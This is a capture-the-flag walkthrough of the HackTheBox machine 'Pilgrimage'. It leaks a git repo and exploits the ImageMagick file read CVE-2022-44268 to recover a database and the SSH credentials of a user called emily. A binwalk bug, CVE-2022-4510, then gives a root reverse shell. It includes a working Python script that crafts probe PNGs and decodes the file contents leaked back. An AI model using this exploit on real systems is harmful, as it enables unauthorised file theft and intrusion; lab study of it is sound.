# Pilgrimage

<details>

<summary>resources</summary>

GitDump:

<https://github.com/Ebryx/GitDump>

Pspy64:

<https://github.com/DominicBreuker/pspy>

</details>

### Phase 1 - Reconnaissance

First, we scan using `nmap`:

![](/files/6JouU9icEwpTIL2KDvaW)

So we have a webpage on port `80`, with a redirect to `pilgrimage.htb`.\
This means that to access the page, we need to add `pilgrimage.htb` to the `/etc/hosts` file:

![](/files/WrY8KD1lQqlRCJyeJggk)

It's a website running an "image shrinker":

![](/files/JVSTuinRuQBKyG4Fc9Kn)

Then, we scan the website using `gobuster`:

![](/files/VrqpDTpGMFgepSnJCspR)

We find a `.git` directory on the site:

![](/files/ZyQAbAWRiCAKMUU8Thex)

Directory listing is forbidden, but the objects underneath are still fetchable, so we use the `GitDump` tool to pull the repository:

![](/files/XQ8lE7OafmvHVnI5Lx36)

![](/files/YlQ7epXRTwfLqtMdFP70)

And we have the `git` files:

![](/files/6mLAln1Kj2PdOgPbIVnz)

### Getting the foothold

First, we investigate the files. The `magick` binary immediately stands out, so we check what it is:

<figure><img src="/files/r8KVBQ86HExA9fNh8ccS" alt=""><figcaption></figcaption></figure>

`ImageMagick 7.1.0-49`. After a bit of googling we find that this version is vulnerable to CVE-2022-44268, an arbitrary file read: a PNG carrying a `profile` text chunk makes ImageMagick read the local file named in that chunk and embed its contents in the converted image:

![](/files/xIhiACDC5Ke1AshbANXs)

{% embed url="<https://www.exploit-db.com/exploits/51261>" %}

First, we test the exploit:

![](/files/qLUPvN9Em0reloWq7nNp)

We upload the file:

![](/files/R3vaKeDSW7VI76uf85X3)

![](/files/D8MZEMW4TP8EpfawkM55)

We download the shrunk image and run `exiftool` on it:

![](/files/cFVGLdqHPmPLGMiPtYeE)

<figure><img src="/files/YBvwX0eZmsruDIoW8U3w" alt=""><figcaption></figcaption></figure>

There's a very long hex string under `Raw Profile Type`, so we plug it into `CyberChef` to decode it from hex:

<figure><img src="/files/Vs752ybgW7LfmjN3FhJA" alt=""><figcaption></figcaption></figure>

The exploit works. It is only an arbitrary file read exploit, so it won't directly give us a shell.

After a bit of looking, we find this code in the `register.php` we found using `GitDump`:

<figure><img src="/files/zlkuGSBI5cSh8T20d06Q" alt=""><figcaption></figcaption></figure>

It accesses the `/var/db/pilgrimage` database file, so that will be our target.\
We run the exploit again:

![](/files/261B2U0GvmEi9s3A3sGp)

We follow the same downloading steps, and run `exiftool` again:

<figure><img src="/files/32xP3stkI42KuJZaox9m" alt=""><figcaption></figcaption></figure>

Note: ImageMagick writes the profile as a name line, a length line and then the hex data, so the file content only begins after the `20480` length and the following line break (rendered by `exiftool` as a dot). We therefore strip the leading `20480.` from our input in this case:

![](/files/IeLMBn0kKg6xe0UU30bd)

We copy the `Raw Profile Type` output to a file named `test`, and use `xxd -r -p` to turn the hex back into bytes:

![](/files/2jcb1vu6nh7OGRfQl1yA)

This is an `SQLite3` database. We open it with `sqlite3` and first look at how the tables were created:

<figure><img src="/files/uSLQeOjSN8MwzlQ8yONS" alt=""><figcaption></figcaption></figure>

We have found the credentials for `emily` (`emily:abigchonkyboi123`)

![](/files/C0f2Jx2S260u05gjz2iG)

The credentials work for SSH.
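The file-read round trip above (probe image in, hex-encoded profile out) can also be done without `exiftool` and `CyberChef`. The block below is an added example written for this page, not the exploit-db script and not code from the box: it builds a probe PNG whose `profile` text chunk names the file to read (the mechanism behind CVE-2022-44268), and it parses the returned PNG to find the `Raw profile type` chunk and decode the embedded bytes. The profile name `sqlite`, the contents of `SAMPLE_BLOB` and the 36-byte-per-line hex layout are assumptions used to build a stand-in for a real shrunk image; none of it is data from the target.

```python
"""Craft a CVE-2022-44268 probe PNG and decode the 'Raw profile type' blob
that a vulnerable ImageMagick embeds in the converted image (added example)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, payload, CRC32 over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def minimal_png(extra_chunks: list[bytes]) -> bytes:
    """A valid 1x1 8-bit greyscale PNG with the given chunks inserted before IDAT."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    return (PNG_SIG + chunk(b"IHDR", ihdr) + b"".join(extra_chunks)
            + chunk(b"IDAT", idat) + chunk(b"IEND", b""))


def craft_probe(path: str) -> bytes:
    """Probe image: a tEXt chunk whose keyword is 'profile' and whose text is the
    file to read. Vulnerable ImageMagick opens that path and copies its contents
    into the output as a 'Raw profile type ...' text chunk."""
    return minimal_png([chunk(b"tEXt", b"profile\x00" + path.encode())])


def png_chunks(data: bytes):
    """Yield (type, payload) for each chunk, verifying every CRC on the way."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def raw_profiles(png: bytes) -> dict[str, str]:
    """Keyword -> profile text for every tEXt/zTXt chunk named 'Raw profile type ...'."""
    found = {}
    for ctype, payload in png_chunks(png):
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        keyword, _, text = payload.partition(b"\x00")
        if not keyword.startswith(b"Raw profile type"):
            continue
        if ctype == b"zTXt":
            if text[:1] != b"\x00":  # only compression method 0 (deflate) is defined
                raise ValueError("unsupported zTXt compression method")
            text = zlib.decompress(text[1:])
        found[keyword.decode("latin-1")] = text.decode("latin-1")
    return found


def decode_profile(text: str) -> bytes:
    """Turn profile text back into bytes. ImageMagick writes
    '\\n<name>\\n<length>\\n<hex...>', so the hex only starts after the length
    line (the '20480.' seen in exiftool): everything up to and including the
    first all-digit line is header, the rest is hex."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    for i, ln in enumerate(lines):
        if ln.isdigit():
            expected = int(ln)
            blob = bytes.fromhex("".join(lines[i + 1:]))
            break
    else:
        raise ValueError("no length line in profile text")
    if len(blob) != expected:
        raise ValueError(f"length header says {expected} bytes, got {len(blob)}")
    return blob


def is_sqlite(blob: bytes) -> bool:
    """Every SQLite 3 file starts with this 16-byte magic."""
    return blob.startswith(b"SQLite format 3\x00")


# Constructed sample (assumption): what a shrunk image would carry if the probe
# asked for a tiny SQLite file. Not the real /var/db/pilgrimage contents.
SAMPLE_BLOB = b"SQLite format 3\x00" + bytes(range(16)) + b"fake-db-body"


def encode_profile(name: str, blob: bytes) -> str:
    """Mirror ImageMagick's raw-profile layout (assumed: 36 bytes of hex per line)."""
    hexed = blob.hex()
    lines = [hexed[i:i + 72] for i in range(0, len(hexed), 72)]
    return f"\n{name}\n{len(blob):8d}\n" + "\n".join(lines) + "\n"


def simulated_output() -> bytes:
    """Stand-in for the image the shrinker hands back after processing the probe."""
    text = encode_profile("sqlite", SAMPLE_BLOB).encode()
    ztxt = b"Raw profile type sqlite\x00\x00" + zlib.compress(text)
    return minimal_png([chunk(b"zTXt", ztxt)])


def recover(png: bytes) -> dict[str, bytes]:
    """Keyword -> decoded bytes for every raw profile found in the image."""
    return {k: decode_profile(v) for k, v in raw_profiles(png).items()}


if __name__ == "__main__":
    probe = craft_probe("/var/db/pilgrimage")
    print("probe chunks:", [t for t, _ in png_chunks(probe)])
    for key, blob in recover(simulated_output()).items():
        print(key, len(blob), "bytes, sqlite:", is_sqlite(blob))
```

Against a real download, `recover(open("shrunk.png", "rb").read())` gives the decoded bytes per profile; reading the chunk directly avoids the copy-and-paste of `exiftool` output, because the length line is parsed instead of stripped by hand.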

### Phase 2 - Privilege escalation

First, we upload `pspy64` to the target to see which processes and jobs run on the system. To serve it, we use the `python3 http.server` module:

![](/files/rjK0fe1bPH5yPn8IYCZZ)

We upload it to the target machine:

![](/files/d2qtVKC18CG2wH43Ls9B)

Then, we can check what's running on the system using `pspy64`:

![](/files/089UVYXb77sq0NxqRCbI)

`malwarescan.sh`:

![](/files/e34bfqxHRNfxzjAlYCLZ)

<details>

<summary>Full code + added comments</summary>

```bash
#!/bin/bash
blacklist=("Executable script" "Microsoft executable")
# Watches the "shrunk/" directory and emits one line per CREATE event, e.g.
#   /var/www/pilgrimage.htb/shrunk/ CREATE upload.png
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        # Rebuilds the full path by keeping everything after "CREATE ".
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        # Runs the vulnerable binwalk on the new file, with -e so it also extracts.
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        # Only afterwards is the scan output compared to the blacklist; a match deletes the file.
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done
```

</details>

The script monitors the `shrunk/` directory of the website and wakes up whenever a new file appears. Each `inotifywait` event line is piped into the loop, where `sed` strips everything up to `CREATE ` to recover the new filename.\
Then `binwalk -e` is run on the file, and only afterwards is its output scanned for the blacklisted keywords; extraction has already happened by the time the check runs.

`pspy` shows the script running as root, so `binwalk` runs as root too. Let's check the version:

![](/files/Mjm8r2CCITTxY9diumcZ)

After a bit of googling, we find that this `binwalk` version is vulnerable to CVE-2022-4510, a remote code execution bug (the exploit below targets binwalk 2.3.2): a path traversal in the PFS filesystem extractor lets a crafted image make `binwalk -e` write a Python file into `~/.config/binwalk/plugins/`, from which binwalk loads and executes plugins:

{% embed url="<https://www.exploit-db.com/exploits/51249>" %}

Because the script runs `binwalk -e` as root on any new file in `shrunk/`, and we can write to that directory as `emily`, we only need to drop a crafted image with the payload into the directory to get a root reverse shell.

### Exploitation

We save a local copy of the exploit as `binwalk_exploit.py`, and run it with any image file as input, our HackTheBox VPN IP address, and the port we will listen on.

<figure><img src="/files/eDccb1UcvIXQQUtffomm" alt=""><figcaption></figcaption></figure>

Before we upload the shell, we open a listener on the port we specified earlier:

![](/files/IsFNQdZxfxIpJFgOBGPF)

To upload the image, we use the `python3 http.server` module, in the same directory as the image we created:

![](/files/cPtaK0uOGqTOA4C5iW4J)

Then, from the target, we fetch the image into the `shrunk/` directory:

<figure><img src="/files/qZ1mvYsWTB4QjCReawcF" alt=""><figcaption></figcaption></figure>

And we get a reverse shell back, as root:

<figure><img src="/files/UZLIYR7Tk1TZrYKY7r8T" alt=""><figcaption></figcaption></figure>
